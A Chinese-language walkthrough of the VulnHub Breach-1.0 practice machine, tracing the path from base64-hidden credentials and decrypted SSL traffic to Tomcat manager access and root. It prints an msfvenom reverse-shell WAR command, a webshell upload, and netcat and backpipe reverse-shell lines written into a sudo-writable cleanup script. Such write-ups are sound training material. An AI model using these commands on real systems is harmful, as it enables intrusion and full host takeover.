kali滲透綜合靶機(十五)--Breach-1.0靶機php
靶機下載地址:https://download.vulnhub.com/breach/Breach-1.0.ziphtml
1、主機發現java
1.netdiscover -i eth0 -r 192.168.110.0/24python
2、端口掃描mysql
1. masscan --rate=10000 -p0-65535 192.168.110.140,發現端口幾乎所有開放了,不符合常識,可能目標對端口掃描作了一些防禦措施linux
3、漏洞查找與利用web
1.目錄掃描sql
2.1直接訪問80端口,進入web首頁http://192.168.110.140/shell
2.2查看頁面源碼發現一串疑似base64加密的字符串數據庫
2.3將其複製到Burpsuite Decoder進行base64解碼,解密後發現仍是base64編碼,繼續base64解碼,獲得pgibbons:damnitfeel$goodtobeagang$ta
2.4.發現圖中的圖片等點擊,點擊跳轉
3.1查看頁面源碼,發現以下提示
3.2嘗試發現頁面是否有有用的信息,發現點擊下圖,跳轉到impresscms登陸界面
4.嘗試使用以前base64解密出來的疑似用戶名密碼的字符串,成功登陸
5.發現cms大體版本信息,搜索引擎搜索是否有相關的漏洞
6. exploit-db.com查找impress cms漏洞:發現ImpressCMS 1.3.9 SQL注入漏洞, /modules/profile/admin/field.php,訪問該頁面,提示沒有權限訪問,沒法進行注入
7. 發現收件箱Inbox顯示有3封郵件,依次打開看
8. 第三個郵件發現有一個SSL證書被保存在192.168.110.140/.keystore
9. 訪問http://192.168.110.140/.keystore下載包含SSL證書的密鑰庫keystore文件,keystore是存儲公私密鑰的一種文件格式
10. 點擊View Account菜單進入界面,再依次點擊頁面的Content,會彈出一行連接Content SSL implementation test capture,點擊連接
11.點擊完上圖的連接,跳轉到以下界面,能夠看到一個名爲:_SSL_test_phase1.pcap的Wireshark流量包文件,下載
12.用wireshark打開下載的pacp包,發現是包的內容通過SSL加密
13.查看keystore這個密匙庫裏面的全部證書
keytool -list -keystore keystore
14. 從密鑰庫導出.p12證書
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
15. 將.p12證書導入Wireshark
在Wireshark中打開_SSL_test_phase1.pcap流量包文件,選擇菜單:編輯–首選項–Protocols–SSL,點擊右邊的Edit
16. 導入證書後,https流量已經被解密,查看每一個http流量包
16.1發現以下
16.2訪問https://192.168.110.140:8443/_M@nag3Me/html發現是tomcat管理頁面,須要登陸
16.3發現tomcat採用採用http basic認證,認證數據包以下,wireshark自動解密tomcat:Tt\5D8F(#!*u=G)4m7zB
17.使用上面獲得的tomcat密碼登陸成功
18.把一句話jsp一句話木立刻傳過去,打包成rar,在修改後綴爲war
19.能夠看到上傳成功
20.菜刀連接失敗, 發現的問題:上傳的菜刀馬,一下子就會消失,文件被刪除,須要從新上傳war包纔可以繼續使用菜刀,主機可能有殺軟或者殺web shell工具。解決方法:bash反彈一個shell出來
21.msf生成一個war格式的反彈shell
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.136 lport=4444 -f war -o test.war
22.msf開啓監聽
23.tomcat後臺上傳test.war文件
24.訪問https://192.168.110.140:8443/test/,等幾秒,kali得到反彈shell
25. python -c 'import pty;pty.spawn("/bin/bash")'
26.拿到shell以後,接下來即是提權了,收集主機信息,發現沒有內核提權,在/etc/passwd發現milton 和 blumbergh用戶
27.在網站發現以下內容
28.查看發現以下內容
29.登陸mysql數據庫,發現milton的密碼
30.解密
31.登陸milton,查看是否屬於sudo組,沒有什麼發現
32. 在http://192.168.110.140/images/目錄下發現六張圖片
33.將圖片複製到kali linux,使用strings打印各圖片其中的可打印字符,追加輸出到images.txt,在vim下查看,密碼在bill.png圖片中,密碼爲coffeestains
34.登陸blumbergh,查看是否屬於sudo組
35.查看權限,發現/usr/share/cleanup/tidyup.sh只有root可寫
36.tidyup.sh文件只有root可寫,而可以以root權限運行tee命令,那麼用tee命令寫tidyup.sh:先將反彈shell命令寫入shell.txt文件,nc反彈命令
echo "nc -e /bin/bash 192.168.110.136 5555" > shell.txt
再使用tee命令將shell.txt內容輸出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
也能夠用mknod backpipe p && nc 192.168.110.136 2222 0<backpipe | /bin/bash 1>backpipe反彈shell
查看tidyup.sh文件寫入成功:cat /usr/share/cleanup/tidyup.sh
37.kali監聽,提權成功